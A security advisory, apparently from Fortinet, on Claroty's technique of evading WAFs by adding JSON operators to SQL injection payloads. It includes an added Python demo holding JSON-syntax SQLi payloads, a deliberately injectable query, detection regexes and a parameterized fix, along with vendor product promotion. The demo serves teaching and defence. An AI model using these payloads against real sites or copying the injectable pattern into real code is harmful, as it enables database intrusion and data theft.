
Generic Web Application Firewall (WAF) Security Bypass

Released: Dec 20, 2022


High Severity


Abusing JSON-Based SQL to Bypass WAF

Security researchers at Claroty recently published a blog post describing a method for bypassing several vendors' WAF solutions. The technique appends JSON syntax (JSON functions and operators that the target database engine understands) to otherwise conventional SQL injection payloads, so that the WAF's SQL injection detection no longer recognizes the request as malicious.

Background

The method described evades WAF inspection by building malicious requests in which JSON syntax is appended to SQL injection payloads. The affected WAFs' SQL parsers did not recognize JSON operators and functions (for example PostgreSQL's `@>` containment operator or MySQL's `JSON_EXTRACT`), so the request was treated as benign while the backend database parsed and executed it. Attackers could then use this access to the backend database, combined with additional vulnerabilities, to exfiltrate data either through direct access to the server or over the cloud.
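As an added example (not code from Fortinet, FortiWeb or Claroty, and not any vendor's rule set), the following Python models the bypass described above: a toy signature WAF whose regexes catch classic tautologies but not their JSON-syntax variants, a hardened rule set that adds the JSON functions and operators the bypass relies on, and a deliberately vulnerable SQLite lookup that executes the SQLite form of the payload beside its parameterized fix. The rules, payloads and `users` table are all constructed for illustration; the PostgreSQL and MySQL payloads are only checked against the WAF rules, not executed.

```python
"""Added example (not code from Fortinet, FortiWeb or Claroty): a toy
signature WAF and the JSON-syntax SQL injection payloads that evade it.
Rules, payloads and the 'users' table are all constructed for illustration."""
import re
import sqlite3

# Classic SQLi signatures of the kind a naive rule set relies on.
NAIVE_RULES = [
    re.compile(r"\bor\b\s+\d+\s*=\s*\d+", re.I),            # ' OR 1=1
    re.compile(r"\bor\b\s+'[^']*'\s*=\s*'[^']*'", re.I),    # ' OR 'a'='a'
    re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),     # UNION SELECT
    re.compile(r"\b(sleep|benchmark|waitfor)\b", re.I),     # time-based probes
]

# Hardened rule set: the same signatures plus the JSON functions and operators
# the bypass relies on (MySQL/SQLite json_extract, MSSQL JSON_VALUE, PostgreSQL
# jsonb casts and containment operators). Deliberately broad; a production WAF
# would scope it to SQL-context parameters to limit false positives.
JSON_RULES = [
    re.compile(r"\b(json_extract|json_value|json_query|json_contains|"
               r"jsonb_path_exists|json_array_length)\s*\(", re.I),
    re.compile(r"(->>?|#>>?|@>|<@|::jsonb?)"),
]
HARDENED_RULES = NAIVE_RULES + JSON_RULES

# Constructed payloads: one classic tautology and three JSON-syntax tautologies.
# Each 'OR ...' clause is always true, so the WHERE clause matches every row.
PAYLOADS = {
    "classic":  "' OR 1=1--",
    "postgres": "' OR '{\"a\":1}'::jsonb @> '{\"a\":1}'--",
    "mysql":    "' OR JSON_EXTRACT('{\"a\":1}','$.a')=1--",
    "sqlite":   "' OR json_extract('{\"a\":1}','$.a')=1--",
}


def waf_blocks(rules, payload):
    """True if any signature matches the request parameter."""
    return any(rule.search(payload) for rule in rules)


def build_demo_db():
    """Throwaway in-memory database standing in for the backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "admin"), ("bob", "user")])
    return conn


def sqlite_json_supported(conn):
    """Python's bundled SQLite usually ships the JSON functions; check anyway."""
    try:
        conn.execute("SELECT json_extract('{\"a\":1}', '$.a')")
        return True
    except sqlite3.OperationalError:
        return False


def vulnerable_lookup(conn, username):
    """The injectable pattern: untrusted input concatenated into the query."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, username):
    """The real fix, which a WAF only compensates for: a bound parameter."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def run_demo():
    """Per payload, whether each rule set blocks it, plus what the vulnerable
    and safe queries return for the SQLite payload."""
    conn = build_demo_db()
    results = {name: {"naive": waf_blocks(NAIVE_RULES, p),
                      "hardened": waf_blocks(HARDENED_RULES, p)}
               for name, p in PAYLOADS.items()}
    if sqlite_json_supported(conn):
        # The trailing -- comments out the closing quote; json_extract(...)=1
        # is true for every row, so the lookup leaks the whole table.
        results["vulnerable_rows"] = vulnerable_lookup(conn, PAYLOADS["sqlite"])
    else:
        results["vulnerable_rows"] = None
    results["safe_rows"] = safe_lookup(conn, PAYLOADS["sqlite"])
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key:16} {value}")
```

Running it shows the classic tautology blocked by both rule sets, the three JSON-syntax variants passing the naive rules and failing only the hardened ones, and the vulnerable lookup returning every username while the parameterized lookup returns nothing. The operator rule is the weak spot to watch in practice: `->` and `::` also occur in legitimate non-SQL input, which is why signature additions like this tend to be scoped per parameter or replaced by a WAF whose SQL parser actually understands JSON syntax.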

Latest Development



December 8th, 2022: Claroty Team82 published its research at: https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf


Fortinet customers using FortiWeb (Fortinet's Web Application Firewall) remain protected against this type of evasion technique. FortiWeb's machine-learning-based anomaly detection protects against zero-day and similar unknown attacks without requiring any special configuration.
https://www.fortinet.com/products/web-application-firewall/fortiweb

FortiGuard Cybersecurity Framework

Mitigate security threats and vulnerabilities by leveraging the range of FortiGuard Services.


PROTECT
  • Anomaly Detection

DETECT
  • Threat Hunting

RESPOND
  • Automated Response

  • Assisted Response Services

RECOVER
  • InfoSec Services

IDENTIFY
  • Attack Surface Monitoring (Inside & Outside)
